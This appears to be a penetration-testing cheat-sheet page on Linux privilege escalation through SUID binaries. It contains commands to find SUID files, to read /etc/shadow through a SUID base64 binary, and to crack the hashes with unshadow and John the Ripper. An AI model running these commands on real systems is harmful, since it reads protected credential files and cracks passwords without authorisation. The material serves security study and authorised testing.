search

SUID

hashtag
General method to find files with SUID bit

$ find / -perm -u=s -type f 2>/dev/null

If there's a particular binary found that has the SUID bit set, refer to https://gtfobins.github.io/arrow-up-right to potentially find an exploit.

hashtag
Example

Suppose the binary /usr/bin/base64 is found to contain the SUID bit. This can be exploited to view the contents of the /etc/shadowfile.

$ base64 /etc/shadow | base64 -d > shadow.txt
$ cat /etc/passwd > passwd.txt

The unshadow command can be used on the shadow.txt and passwd.txt files to create a file that is crack-able by John the ripper.

$ unshadow passwd.txt shadow.txt > password.txt
$ john --wordlist=[wordlist] password.txt
...

Subsequently, the password for a user with more privileges than the current one may be cracked. This will allow us to access that account to further escalate our privileges. For example, the cracked user may have SUID bits set, or sudo privileges for certain binaries that may contain exploits to access the root shell.

PreviousSudoNextCapabilities

Last updated